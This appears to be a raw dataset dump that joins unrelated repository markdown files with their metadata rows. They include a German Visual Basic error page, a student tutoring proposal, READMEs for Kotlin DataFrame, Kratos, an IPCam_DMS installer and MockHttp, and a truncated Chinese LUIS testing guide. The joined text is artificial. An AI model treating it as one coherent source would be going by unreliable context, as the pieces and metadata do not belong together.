powerful place. Ask for feedback. If you’re not spending 5 percent of your day building relationships, you’re doing something wrong. When you pinch pennies, you’re wasting time and energy on meaningless matters. “A personal brand is a promise of performance that creates expectations in its audience. Done well, it clearly communicates the values, personality, and abilities of the person behind it.”
45.844156
311
0.787535
eng_Latn
0.999918
539f5cb43bfac5760cca0cea85885e22e7b5a365
1,364
md
Markdown
docs/visual-basic/misc/bc30581.md
Graflinger/docs.de-de
9dfa50229d23e2ee67ef4047b6841991f1e40ac4
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/visual-basic/misc/bc30581.md
Graflinger/docs.de-de
9dfa50229d23e2ee67ef4047b6841991f1e40ac4
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/visual-basic/misc/bc30581.md
Graflinger/docs.de-de
9dfa50229d23e2ee67ef4047b6841991f1e40ac4
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Ausdruck 'AddressOf' kann nicht konvertiert werden, um '<typename>'da'<typename>' kein Delegattyp ist ms.date: 07/20/2015 f1_keywords: - vbc30581 - bc30581 helpviewer_keywords: - BC30581 ms.assetid: 5db7589a-5456-4b3a-9d6b-93d9157f0484 ms.openlocfilehash: 80684bd3748ff7f839e5d2b8f38e488d35330201 ms.sourcegitcommit: 5c1abeec15fbddcc7dbaa729fabc1f1f29f12045 ms.translationtype: MT ms.contentlocale: de-DE ms.lasthandoff: 03/15/2019 ms.locfileid: "58029414" --- # <a name="addressof-expression-cannot-be-converted-to-typename-because-typename-is-not-a-delegate-type"></a>Ausdruck 'AddressOf' kann nicht konvertiert werden, um '\<Typname >' da'\<Typname >' kein Delegattyp ist Eine Anweisung versucht, einen `AddressOf` -Ausdruck in einen Typ zu konvertieren, der kein Delegattyp ist. Der `AddressOf` -Operator erstellt eine Delegatinstanz einer Prozedur, die auf eine bestimmte Prozedur verweist. `AddressOf` kann als Operand eines Delegatkonstruktors oder in einem Kontext verwendet werden, in dem der Typ des Delegaten vom Compiler bestimmt werden kann. **Fehler-ID:** BC30581 ## <a name="to-correct-this-error"></a>So beheben Sie diesen Fehler - Ändern Sie den Zieltyp in einen Delegattyp. ## <a name="see-also"></a>Siehe auch - [AddressOf-Operator](../../visual-basic/language-reference/operators/addressof-operator.md)
44
274
0.772727
deu_Latn
0.913072
539fa779c1d466d16d6ad4efbeb1807171e36a42
2,039
md
Markdown
_posts/2021-11-30-Final-Project-Proposal.md
JacobSilverstein1/JacobSilverstein1.github.io
7b63762a54a9d2a80f1a3e73bb849038e4ebf21e
[ "MIT" ]
null
null
null
_posts/2021-11-30-Final-Project-Proposal.md
JacobSilverstein1/JacobSilverstein1.github.io
7b63762a54a9d2a80f1a3e73bb849038e4ebf21e
[ "MIT" ]
null
null
null
_posts/2021-11-30-Final-Project-Proposal.md
JacobSilverstein1/JacobSilverstein1.github.io
7b63762a54a9d2a80f1a3e73bb849038e4ebf21e
[ "MIT" ]
null
null
null
### Bringing HM Together In our grade, there are large divisions between different friend groups. This is a problem because it discourages people from getting to know others that they could easily make friends with and would likely get along well with. This is evident in my FoTW observation of the library: people from different friend groups will sit in different areas, and people will often section themselves off from others by sitting in the small rooms off to the side of the main area. I find that I will often talk to those outside of my friends who are in some of my classes, but really won't try to branch out to people I don't really know in other contexts. I know that many others feel the same way. During our FoTW in the library, we observed conversations between people talking about their teachers and what they were learning in each of their classes. I think a way that we could try to encourage people that don't know each other to meet is through a grade-wide, or even school-wide, tutoring program. This would encourage people to build relationships with others, to text or call outside of school, and just serves as a good way for people to get to know each other. This relates to the theme of fostering community engagement because it not only helps students get to know each other better, but allows them to help each other to improve at school more generally. Such a program exists with high school kids tutoring middle division kids, and this program is very successful. Also, this program would help solve the problem that it can be very difficult to get help with classes sometimes. I know that my and many other juniors' and seniors' schedules are jammed packed, and finding time to meet with teachers for an adequate amount of time in the couple days before a test or quiz can be difficult, or even downright impossible. This would allow students to help others in subjects that they are stronger and get help in subjects they are weaker, generally helping others to become better at their weaker subjects.
509.75
2,012
0.804316
eng_Latn
0.999997
53a0da6897fb550e5f2571a9745caff5bf42ab02
6,055
md
Markdown
README.md
nikitinas/krangl-typed
949a8d79b016e503b3702b4184a5ae104902d91d
[ "Apache-2.0" ]
3
2020-07-01T10:06:41.000Z
2020-10-13T15:21:45.000Z
README.md
nikitinas/krangl-typed
949a8d79b016e503b3702b4184a5ae104902d91d
[ "Apache-2.0" ]
2
2020-08-20T17:04:35.000Z
2020-08-20T19:47:49.000Z
README.md
nikitinas/krangl-typed
949a8d79b016e503b3702b4184a5ae104902d91d
[ "Apache-2.0" ]
null
null
null
# Kotlin Dataframe: typesafe in-memory structured data processing for JVM [![JetBrains incubator project](https://jb.gg/badges/incubator.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub) [![Kotlin component alpha stability](https://img.shields.io/badge/project-alpha-kotlin.svg?colorA=555555&colorB=DB3683&label=&logo=kotlin&logoColor=ffffff&logoWidth=10)](https://kotlinlang.org/docs/components-stability.html) [![Kotlin](https://img.shields.io/badge/kotlin-1.7.0-blue.svg?logo=kotlin)](http://kotlinlang.org) [![Maven Central](https://img.shields.io/maven-central/v/org.jetbrains.kotlinx/dataframe?color=blue&label=Maven%20Central)](https://search.maven.org/artifact/org.jetbrains.kotlinx/dataframe) [![GitHub License](https://img.shields.io/badge/license-Apache%20License%202.0-blue.svg?style=flat)](http://www.apache.org/licenses/LICENSE-2.0) Kotlin Dataframe aims to reconcile Kotlin static typing with dynamic nature of data by utilizing both the full power of Kotlin language and opportunities provided by intermittent code execution in Jupyter notebooks and REPL. * **Hierarchical** — represents hierarchical data structures, such as JSON or a tree of JVM objects. * **Functional** — data processing pipeline is organized in a chain of `DataFrame` transformation operations. Every operation returns a new instance of `DataFrame` reusing underlying storage wherever it's possible. * **Readable** — data transformation operations are defined in DSL close to natural language. * **Practical** — provides simple solutions for common problems and ability to perform complex tasks. * **Minimalistic** — simple, yet powerful data model of three column kinds. * **Interoperable** — convertable with Kotlin data classes and collections. * **Generic** — can store objects of any type, not only numbers or strings. * **Typesafe** — on-the-fly generation of extension properties for type safe data access with Kotlin-style care for null safety. * **Polymorphic** — type compatibility derives from column schema compatibility. You can define a function that requires a special subset of columns in dataframe but doesn't care about other columns. Integrates with [Kotlin kernel for Jupyter](https://github.com/Kotlin/kotlin-jupyter). Inspired by [krangl](https://github.com/holgerbrandl/krangl), Kotlin Collections and [pandas](https://pandas.pydata.org/) Explore [**documentation**](https://kotlin.github.io/dataframe/overview.html) for details. ## Setup ### Gradle ```groovy repositories { mavenCentral() } dependencies { implementation 'org.jetbrains.kotlinx:dataframe:0.8.0-rc-9' } ``` ### Jupyter Notebook Install [Kotlin kernel](https://github.com/Kotlin/kotlin-jupyter) for [Jupyter](https://jupyter.org/) Import stable `dataframe` version into notebook: ``` %use dataframe ``` or specific version: ``` %use dataframe(<version>) ``` ## Data model * `DataFrame` is a list of columns with equal sizes and distinct names. * `DataColumn` is a named list of values. Can be one of three kinds: * `ValueColumn` — contains data * `ColumnGroup` — contains columns * `FrameColumn` — contains dataframes ## Usage example **Create:** ```kotlin // create columns val fromTo by columnOf("LoNDon_paris", "MAdrid_miLAN", "londON_StockhOlm", "Budapest_PaRis", "Brussels_londOn") val flightNumber by columnOf(10045.0, Double.NaN, 10065.0, Double.NaN, 10085.0) val recentDelays by columnOf("23,47", null, "24, 43, 87", "13", "67, 32") val airline by columnOf("KLM(!)", "{Air France} (12)", "(British Airways. )", "12. Air France", "'Swiss Air'") // create dataframe val df = dataFrameOf(fromTo, flightNumber, recentDelays, airline) ``` **Clean:** ```kotlin // typed accessors for columns // that will appear during // dataframe transformation val origin by column<String>() val destination by column<String>() val clean = df // fill missing flight numbers .fillNA { flightNumber }.with { prev()!!.flightNumber + 10 } // convert flight numbers to int .convert { flightNumber }.toInt() // clean 'airline' column .update { airline }.with { "([a-zA-Z\\s]+)".toRegex().find(it)?.value ?: "" } // split 'fromTo' column into 'origin' and 'destination' .split { fromTo }.by("_").into(origin, destination) // clean 'origin' and 'destination' columns .update { origin and destination }.with { it.lowercase().replaceFirstChar(Char::uppercase) } // split lists of delays in 'recentDelays' into separate columns // 'delay1', 'delay2'... and nest them inside original column `recentDelays` .split { recentDelays }.inward { "delay$it" } // convert string values in `delay1`, `delay2` into ints .parse { recentDelays } ``` **Aggregate:** ```kotlin clean // group by the flight origin renamed into "from" .groupBy { origin named "from" }.aggregate { // we are in the context of single data group // total number of flights from origin count() into "count" // list of flight numbers flightNumber into "flight numbers" // counts of flights per airline airline.valueCounts() into "airlines" // max delay across all delays in `delay1` and `delay2` recentDelays.maxOrNull { delay1 and delay2 } into "major delay" // separate lists of recent delays for `delay1`, `delay2` and `delay3` recentDelays.implode(dropNulls = true) into "recent delays" // total delay per destination pivot { destination }.sum { recentDelays.intCols() } into "total delays to" } ``` [Try it in **Datalore**](https://datalore.jetbrains.com/view/notebook/vq5j45KWkYiSQnACA2Ymij) and explore [**more examples here**](examples). ## Code of Conduct This project and the corresponding community are governed by the [JetBrains Open Source and Community Code of Conduct](https://confluence.jetbrains.com/display/ALL/JetBrains+Open+Source+and+Community+Code+of+Conduct). Please make sure you read it. ## License Kotlin Dataframe is licensed under the [Apache 2.0 License](LICENSE).
44.19708
247
0.723865
eng_Latn
0.825305
53a16d62a2b82804f8cb0d5bffa7c9b1acf4b9ee
3,197
md
Markdown
README_zh.md
xushuhui/kratos
4513aecdc7f4c60b9d66d193515bf471b744ebe3
[ "MIT" ]
2
2021-06-14T07:48:48.000Z
2021-06-29T11:40:11.000Z
README_zh.md
yiwenlong/kratos
2a47af33c0037a5dab72af1340ba890818eecc7d
[ "MIT" ]
null
null
null
README_zh.md
yiwenlong/kratos
2a47af33c0037a5dab72af1340ba890818eecc7d
[ "MIT" ]
null
null
null
![kratos](docs/images/kratos.png) [![Language](https://img.shields.io/badge/Language-Go-blue.svg)](https://golang.org/) [![Build Status](https://github.com/go-kratos/kratos/workflows/Go/badge.svg)](https://github.com/go-kratos/kratos/actions) [![GoDoc](https://pkg.go.dev/badge/github.com/go-kratos/kratos/v2)](https://pkg.go.dev/github.com/go-kratos/kratos/v2) [![Go Report Card](https://goreportcard.com/badge/github.com/go-kratos/kratos)](https://goreportcard.com/report/github.com/go-kratos/kratos) [![Discord](https://img.shields.io/discord/766619759214854164?label=chat&logo=discord)](https://discord.gg/BWzJsUJ) Translations: [English](README.md) | [简体中文](README_zh.md) # Kratos Kratos 一套轻量级 Go 微服务框架,包含大量微服务相关框架及工具。 > 名字来源于:《战神》游戏以希腊神话为背景,讲述由凡人成为战神的奎托斯(Kratos)成为战神并展开弑神屠杀的冒险历程。 ## Goals 我们致力于提供完整的微服务研发体验,整合相关框架及工具后,微服务治理相关部分可对整体业务开发周期无感,从而更加聚焦于业务交付。对每位开发者而言,整套 Kratos 框架也是不错的学习仓库,可以了解和参考到微服务方面的技术积累和经验。 ### Principles * 简单:不过度设计,代码平实简单; * 通用:通用业务开发所需要的基础库的功能; * 高效:提高业务迭代的效率; * 稳定:基础库可测试性高,覆盖率高,有线上实践安全可靠; * 健壮:通过良好的基础库设计,减少错用; * 高性能:性能高,但不特定为了性能做 hack 优化,引入 unsafe ; * 扩展性:良好的接口设计,来扩展实现,或者通过新增基础库目录来扩展功能; * 容错性:为失败设计,大量引入对 SRE 的理解,鲁棒性高; * 工具链:包含大量工具链,比如 cache 代码生成,lint 工具等等; ## Features * APIs:协议通信以 HTTP/gRPC 为基础,通过 Protobuf 进行定义; * Errors:通过 Protobuf 的 Enum 作为错误码定义,以及工具生成判定接口; * Metadata:在协议通信 HTTP/gRPC 中,通过 Middleware 规范化服务元信息传递; * Config:支持多数据源方式,进行配置合并铺平,通过 Atomic 方式支持动态配置; * Logger:标准日志接口,可方便集成三方 log 库,并可通过 fluentd 收集日志; * Metrics:统一指标接口,可以实现各种指标系统,默认集成 Prometheus; * Tracing:遵循 OpenTelemetry 规范定义,以实现微服务链路追踪; * Encoding:支持 Accept 和 Content-Type 进行自动选择内容编码; * Transport:通用的 HTTP/gRPC 传输层,实现统一的 Middleware 插件支持; * Registry:实现统一注册中心接口,可插件化对接各种注册中心; ## Getting Started ### Required - [go](https://golang.org/dl/) - [protoc](https://github.com/protocolbuffers/protobuf) - [protoc-gen-go](https://github.com/protocolbuffers/protobuf-go) ### Installing ``` go get github.com/go-kratos/kratos/cmd/kratos/v2@latest ``` ### Create a service ``` # 创建项目模板 kratos new helloworld cd helloworld # 拉取项目依赖 go mod download # 生成proto模板 kratos proto add api/helloworld/helloworld.proto # 生成proto源码 kratos proto client api/helloworld/helloworld.proto # 生成server模板 kratos proto server api/helloworld/helloworld.proto -t internal/service # 生成所有proto源码、wire等等 go generate ./... # 编译成可执行文件 go build -o ./bin/ ./... # 运行程序 ./bin/helloworld -conf ./configs ``` ### Kratos Boot ``` import "github.com/go-kratos/kratos/v2" import "github.com/go-kratos/kratos/v2/transport/grpc" import "github.com/go-kratos/kratos/v2/transport/http" httpSrv := http.NewServer(http.Address(":8000")) grpcSrv := grpc.NewServer(grpc.Address(":9000")) app := kratos.New( kratos.Name("kratos"), kratos.Version("latest"), kratos.Server(httpSrv, grpcSrv), ) app.Run() ``` ## Related * [Docs](https://go-kratos.dev/) * [Examples](./examples) * [Service Layout](https://github.com/go-kratos/kratos-layout) ## Community * [Wechat Group](https://github.com/go-kratos/kratos/issues/682) * [Discord Group](https://discord.gg/BWzJsUJ) * QQ Group: 716486124 ## Sponsors and Backers ![kratos](docs/images/alipay.png) ## License Kratos is MIT licensed. See the [LICENSE](./LICENSE) file for details.
28.292035
140
0.744135
yue_Hant
0.473746
53a1a25c3d1877ad06e9be1ac460463d99643b0e
379
md
Markdown
content/posts/2020/07/my-toolkit-2018-2019.md
chumaumenze/chumaumenze
fa56c7058b7c7aca69e95b8a5907a5b1bfb38aa3
[ "MIT" ]
null
null
null
content/posts/2020/07/my-toolkit-2018-2019.md
chumaumenze/chumaumenze
fa56c7058b7c7aca69e95b8a5907a5b1bfb38aa3
[ "MIT" ]
10
2021-03-09T00:53:16.000Z
2022-02-26T09:54:06.000Z
content/posts/2020/07/my-toolkit-2018-2019.md
chumaumenze/chumaumenze
fa56c7058b7c7aca69e95b8a5907a5b1bfb38aa3
[ "MIT" ]
null
null
null
--- title: "My Toolkit (2018/2019)" published_time: 2020-07-03T23:13:45.531509 modified_time: 2020-07-03T23:13:45.531530 expiration_time: published: false category: journal tags: [] cover_image: "../../../../static/uploads/images/helloworld.gif" cover_image_caption: "Hello world HTML tag" description: "My Toolkit (2018/2019)" external_link: "" --- ## My Toolkit (2018/2019)
22.294118
63
0.728232
eng_Latn
0.119115
53a1da476206f8de190540f0d4e1edd8e4fbb7c7
1,327
md
Markdown
README.md
yuccastream/IPcam_DMS-installer
add544040b8ea40a4b9df64820bbe805b123f51f
[ "MIT" ]
1
2021-04-09T08:32:31.000Z
2021-04-09T08:32:31.000Z
README.md
yuccastream/IPcam_DMS-installer
add544040b8ea40a4b9df64820bbe805b123f51f
[ "MIT" ]
null
null
null
README.md
yuccastream/IPcam_DMS-installer
add544040b8ea40a4b9df64820bbe805b123f51f
[ "MIT" ]
null
null
null
# IPCam_DMS-installer A simple helper script to install [IPCam_DMS](https://team.openipc.org/ipcam_dms/) in GNU/Linux ## Feature: 1. Supported GNU/Linux distributtions: Debian, Ubuntu, Elementary OS, Zorin OS, Linux Mint, Kali Linux, Fedora, RHEL, CentOS, IGOS Nusantara, Archlinux 2. Installs wine 3. Upgrades wine (from the distribution's repo) to a newer version (only for Fedora, RHEL, CentOS, IGN) 4. Menu entry in the application launcher 5. Latest IPCam_DMS from https://team.openipc.org/ipcam_dms/ ## How to install: Copy and paste this commands to your terminal: 1. `cd /tmp` 1. `git clone https://github.com/yuccastream/IPCam_DMS-installer.git` 1. `cd IPCam_DMS-installer` 1. `sudo ./ipcam_dms-setup install` **OR** `sudo bash ipcam_dms-setup install` ## Firewall setting: On Fedora/CentOS/Redhat, if you experience neighbor discovery problems, open the port in the firewall `firewall-cmd --permanent --add-port=34569/udp` `firewall-cmd --reload` ## Icon cache in GTK based desktop: Optional step for GTK based desktop, if the icon is not loaded or loaded with wrong size. Update icon cache with this command: `gtk-update-icon-cache -f -t /usr/share/icons/hicolor` ## How to remove: If you want to remove winbox, just run this command: `sudo ./ipcam_dms-setup remove` **OR** `sudo ./ipcam_dms-setup remove`
37.914286
151
0.754333
eng_Latn
0.713194
53a1db454cb30c13e1f1229e372b80d6ce03f22c
10,022
md
Markdown
README.md
Salihler/mockhttp
b7b690058a8cc09fbc6f7cbea9a4809f760a536f
[ "MIT" ]
755
2015-01-07T16:56:32.000Z
2022-03-30T05:33:27.000Z
README.md
Salihler/mockhttp
b7b690058a8cc09fbc6f7cbea9a4809f760a536f
[ "MIT" ]
83
2015-01-05T22:08:34.000Z
2022-03-05T10:21:05.000Z
README.md
Salihler/mockhttp
b7b690058a8cc09fbc6f7cbea9a4809f760a536f
[ "MIT" ]
75
2015-03-27T14:13:37.000Z
2022-03-10T03:13:47.000Z
[![NuGet](http://img.shields.io/nuget/v/RichardSzalay.MockHttp.svg?style=flat-square)](https://www.nuget.org/packages/RichardSzalay.MockHttp/)[![NuGet](https://img.shields.io/nuget/dt/RichardSzalay.MockHttp.svg?style=flat-square)](https://www.nuget.org/packages/RichardSzalay.MockHttp/) [![Build status](https://ci.appveyor.com/api/projects/status/3in8hmcyg11wpcjw/branch/master?svg=true)](https://ci.appveyor.com/project/richardszalay/mockhttp) MockHttp for HttpClient ===================== MockHttp is a testing layer for Microsoft's HttpClient library. It allows stubbed responses to be configured for matched HTTP requests and can be used to test your application's service layer. ## NuGet PM> Install-Package RichardSzalay.MockHttp ## How? MockHttp defines a replacement `HttpMessageHandler`, the engine that drives HttpClient, that provides a fluent configuration API and provides a canned response. The caller (eg. your application's service layer) remains unaware of its presence. ## Usage ```csharp var mockHttp = new MockHttpMessageHandler(); // Setup a respond for the user api (including a wildcard in the URL) mockHttp.When("http://localhost/api/user/*") .Respond("application/json", "{'name' : 'Test McGee'}"); // Respond with JSON // Inject the handler or client into your application code var client = mockHttp.ToHttpClient(); var response = await client.GetAsync("http://localhost/api/user/1234"); // or without async: var response = client.GetAsync("http://localhost/api/user/1234").Result; var json = await response.Content.ReadAsStringAsync(); // No network connection required Console.Write(json); // {'name' : 'Test McGee'} ``` ### When (Backend Definitions) vs Expect (Request Expectations) `MockHttpMessageHandler` defines both `When` and `Expect`, which can be used to define responses. They both expose the same fluent API, but each works in a slightly different way. Using `When` specifies a "Backend Definition". Backend Definitions can be matched against multiple times and in any order, but they won't match if there are any outstanding Request Expectations present (unless `BackendDefinitionBehavior.Always` is specified). If no Request Expectations match, `Fallback` will be used. Using `Expect` specifies a "Request Expectation". Request Expectations match only once and in the order they were added in. Only once all expectations have been satisfied will Backend Definitions be evaluated. Calling `mockHttp.VerifyNoOutstandingExpectation()` will assert that there are no expectations that have yet to be called. Calling `ResetExpectations` clears the the queue of expectations. This pattern is heavily inspired by [AngularJS's $httpBackend](https://docs.angularjs.org/api/ngMock/service/$httpBackend) ### Matchers (With*) The `With` and `Expect` methods return a `MockedRequest`, which can have additional constraints (called matchers) placed on them before specifying a response with `Respond`. Passing an HTTP method and URL to `When` or `Expect` is equivalent to applying a Method and Url matcher respectively. The following chart breaks down additional built in matchers and their usage: | Method | Description | | ------ | ----------- | | <pre>WithQueryString("key", "value")<br /><br />WithQueryString("key=value&other=value")<br /><br />WithQueryString(new Dictionary&lt;string,string><br />{<br /> { "key", "value" },<br /> { "other", "value" }<br />}<br /></pre> | Matches on one or more querystring values, ignoring additional values | | <pre>WithExactQueryString("key=value&other=value")<br /><br />WithExactQueryString(new Dictionary&lt;string,string><br />{<br /> { "key", "value" },<br /> { "other", "value" }<br />}<br /></pre> | Matches on one or more querystring values, rejecting additional values | | <pre>WithFormData("key", "value")<br /><br />WithFormData("key=value&other=value")<br /><br />WithFormData(new Dictionary&lt;string,string><br />{<br /> { "key", "value" },<br /> { "other", "value" }<br />})<br /></pre> | Matches on one or more form data values, ignoring additional values | | <pre>WithExactFormData("key=value&other=value")<br /><br />WithExactFormData(new Dictionary&lt;string,string><br />{<br /> { "key", "value" },<br /> { "other", "value" }<br />})<br /></pre> | Matches on one or more form data values, rejecting additional values | | <pre>WithContent("{'name':'McGee'}")</pre> | Matches on the (post) content of the request | | <pre>WithPartialContent("McGee")</pre> | Matches on the partial (post) content of the request | | <pre>WithHeaders("Authorization", "Basic abcdef")<br /><br />WithHeaders(@"Authorization: Basic abcdef<br />Accept: application/json")<br /><br />WithHeaders(new Dictionary&lt;string,string><br />{<br /> { "Authorization", "Basic abcdef" },<br /> { "Accept", "application/json" }<br />})<br /></pre> | Matches on one or more HTTP header values | | <pre>With(request => request.Content.Length > 50)</pre> | Applies custom matcher logic against an HttpRequestMessage | These methods are chainable, making complex requirements easy to descirbe. ### Verifying Matches When using Request Expectations via `Expect`, `MockHttpMessageHandler.VerifyNoOutstandingExpectation()` can be used to assert that there are no unmatched requests. For other use cases, `GetMatchCount` will return the number of times a mocked request (returned by When / Expect) was called. This even works with `Fallback`, so you can check how many unmatched requests there were. ```csharp var mockHttp = new MockHttpMessageHandler(); var request = mockHttp.When("http://localhost/api/user/*") .Respond("application/json", "{'name' : 'Test McGee'}"); var client = mockHttp.ToHttpClient(); await client.GetAsync("http://localhost/api/user/1234"); await client.GetAsync("http://localhost/api/user/2345"); await client.GetAsync("http://localhost/api/user/3456"); Console.Write(mockHttp.GetMatchCount(request)); // 3 ``` ### Match Behavior Each request is evaluated using the following process: 1. If Request Expectations exist and the request matches the next expectation in the queue, the expectation is used to process the response and is then removed from the queue 2. If no Request Expectations exist, or the handler was constructed with `BackendDefinitionBehavior.Always`, the first matching Backend Definition processes the response 3. `MockHttpMessageHandler.Fallback` handles the request ### Fallback The `Fallback` property handles all requests that weren't handled by the match behavior. Since it is also a mocked request, any of the `Respond` overloads can be applied. ``` // Unhandled requests should throw an exception mockHttp.Fallback.Throw(new InvalidOperationException("No matching mock handler")); // Unhandled requests should be executed against the network mockHttp.Fallback.Respond(new HttpClient()); ``` The default fallback behavior is to return an empty response the status `404 No matching mock handler for "GET http://host/url"`. ### Examples This example uses Expect to test an OAuth ticket recycle process: ```csharp // Simulate an expired token mockHttp.Expect("/users/me") .WithQueryString("access_token", "old_token") .Respond(HttpStatusCode.Unauthorized); // Expect the request to refresh the token and supply a new one mockHttp.Expect("/tokens/refresh") .WithFormData("refresh_token", "refresh_token") .Respond("application/json", "{'access_token' : 'new_token', 'refresh_token' : 'new_refresh'}"); // Expect the original call to be retried with the new token mockHttp.Expect("/users/me") .WithQueryString("access_token", "new_token") .Respond("application/json", "{'name' : 'Test McGee'}"); var httpClient = mockHttp.ToHttpClient(); var userService = new UserService(httpClient); var user = await userService.GetUserDetails(); Assert.Equals("Test McGee", user.Name); mockHttp.VerifyNoOutstandingExpectation(); ``` ## Platform Support MockHttp is compiled for .NET Standard 2.0, .NET Standard 1.1, .NET 4, and .NET 4.5, as well a Portable Class Library (Profile 328) supporting: * .NET 4 * Silverlight 5 * Winodws 8 * Windows Phone Silverlight 8 * Windows Phone 8.1 * Xamarin iOS * Xamarin Android ## Build / Release Clone the repository and build `RichardSzalay.MockHttp.sln` using MSBuild. NuGet package restore must be enabled. To release, build: ``` msbuild Release.proj /p:PackageVersion=1.2.3 ``` If you fork the project, simply rename the `nuspec` file accordingly and it will be picked up by the release script. ## Contributors Many thanks to all the members of the community that have contributed PRs to this project: * [jozefizso](https://github.com/jozefizso) * [camiller2](https://github.com/camiller2) * [wislon](https://github.com/wislon) * [coryflucas](https://github.com/coryflucas) * [esskar](https://github.com/esskar) * [jericho](https://github.com/jericho) ## License The MIT License (MIT) Copyright (c) 2018 Richard Szalay Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
50.11
398
0.744861
eng_Latn
0.785136
53a20556355c9ff71105f1d38fea5ad03494cc23
6,373
md
Markdown
articles/cognitive-services/LUIS/luis-concept-devops-testing.md
Yueying-Liu/mc-docs.zh-cn
21000ea687a4cda18cecf10e9183fd2172918bb5
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cognitive-services/LUIS/luis-concept-devops-testing.md
Yueying-Liu/mc-docs.zh-cn
21000ea687a4cda18cecf10e9183fd2172918bb5
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cognitive-services/LUIS/luis-concept-devops-testing.md
Yueying-Liu/mc-docs.zh-cn
21000ea687a4cda18cecf10e9183fd2172918bb5
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: LUIS 应用 DevOps 测试 description: 如何在 DevOps 环境中测试语言理解 (LUIS) 应用。 ms.service: cognitive-services ms.subservice: language-understanding ms.topic: conceptual ms.date: 10/19/2020 ms.author: v-johya ms.openlocfilehash: 36ed67cc5f41a247e75ca37fe22ba66af0890722 ms.sourcegitcommit: 537d52cb783892b14eb9b33cf29874ffedebbfe3 ms.translationtype: HT ms.contentlocale: zh-CN ms.lasthandoff: 10/23/2020 ms.locfileid: "92472484" --- # <a name="testing-for-luis-devops"></a>LUIS DevOps 测试 正在开发语言理解 (LUIS) 应用的软件工程师可以通过遵循以下指南,应用关于[源代码管理](luis-concept-devops-sourcecontrol.md)、[自动生成](luis-concept-devops-automation.md)、[测试](luis-concept-devops-testing.md)和[发布管理](luis-concept-devops-automation.md#release-management)的 DevOps 实践。 在敏捷软件开发方法中,测试在生成优质软件方面扮演着重要的角色。 对 LUIS 应用的每个重大更改都应附带测试,旨在测试开发人员在应用中生成的新功能。 这些测试将与 LUIS 应用的 `.lu` 源一起签入到源代码存储库中。 当应用满足测试条件时,将完成更改的实现。 测试是 [CI/CD 工作流](luis-concept-devops-automation.md)的关键部分。 当拉取请求 (PR) 建议对 LUIS 应用进行更改时,或者在将更改合并到主分支后,CI 工作流应运行测试,以验证更新是否未导致任何回归。 ## <a name="how-to-do-unit-testing-and-batch-testing"></a>如何进行单元测试和批处理测试 对于需要在持续集成工作流中执行的 LUIS 应用,有两种不同类型的测试: - **单元测试** - 相对简单的测试,用于验证 LUIS 应用的主要功能。 当给定的测试言语返回预期意向和预期实体时,单元测试通过。 所有单元测试都必须通过,测试运行才能成功完成。 这种测试类似于[交互式测试](/cognitive-services/luis/luis-concept-test),可以在 [LUIS 门户](https://luis.azure.cn/)中进行。 - **批处理测试** - 批处理测试是对当前已训练的模型进行的全面测试,用于衡量其性能。 与单元测试不同,批处理测试不是关于“通过或失败”的测试。 批处理测试的预期不是每个测试都将返回预期意向和预期实体。 相反,批处理测试可帮助你在应用中查看每个意向和实体的准确性,并帮助你将一段时间内的改进进行比较。 这种类型的测试与可以在 LUIS 门户中以交互方式执行的[批处理测试](/cognitive-services/luis/luis-concept-batch-test)相同。 可以从项目的开头使用单元测试。 当你开发 LUIS 应用的架构后,要提高其准确性时,批处理测试才具有真正的价值。 对于单元测试和批处理测试,请确保测试言语与训练言语保持独立。 如果将用于训练的数据用于测试,你会得到应用性能极佳的错误印象,而事实只是模型与测试数据过拟合而已。 测试对于模型必须是陌生的,以测试它的通用化程度。 ### <a name="writing-tests"></a>编写测试 编写一组测试时,对于每个测试,都需要定义: * 测试话语 * 预期意向 * 预期实体。 使用 LUIS [批处理文件语法](/cognitive-services/luis/luis-concept-batch-test#batch-syntax-template-for-intents-with-entities)在 JSON 格式的文件中定义一组测试。 例如: ```JSON [ { "text": "example utterance goes here", "intent": "intent name goes here", "entities": [ { "entity": "entity name 1 goes here", "startPos": 14, "endPos": 23 }, { "entity": "entity name 2 goes here", "startPos": 14, "endPos": 23 } ] } ] ``` 一些测试工具,如 [NLU.DevOps](https://github.com/microsoft/NLU.DevOps) 还支持 LUDown 格式的测试文件。 #### <a name="designing-unit-tests"></a>设计单元测试 单元测试应设计为测试 LUIS 应用的核心功能。 在应用开发的每个迭代或冲刺 (sprint) 中,应编写足够多的测试,以验证在该迭代中实现的关键功能是否正常工作。 在每个单元测试中,对于给定的测试言语,可以: * 测试是否返回了正确的意向 * 测试是否正在返回对解决方案至关重要的“密钥”实体。 * 测试意向和实体的[预测分数](/cognitive-services/luis/luis-concept-prediction-score)是否超出了定义的阈值。 例如,可以决定仅在意向和关键实体的预测分数超过 0.75 时才认为测试已通过。 在单元测试中,最好测试是否已在预测响应中返回关键实体,但忽略任何误报。 误报是在预测响应中找到的实体,但未在测试的预期结果中定义。 忽略误报使得创作单元测试变得不太繁琐,同时仍允许你将精力集中在测试是否在预测响应中返回对解决方案至关重要的数据。 > [!TIP] > [NLU.DevOps](https://github.com/microsoft/NLU.DevOps) 工具支持所有 LUIS 测试需求。 当在[单元测试模式](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md#unit-test-mode)下使用时,`compare` 命令将断言所有测试都通过,并将忽略未在预期结果中标记的实体的误报结果。 #### <a 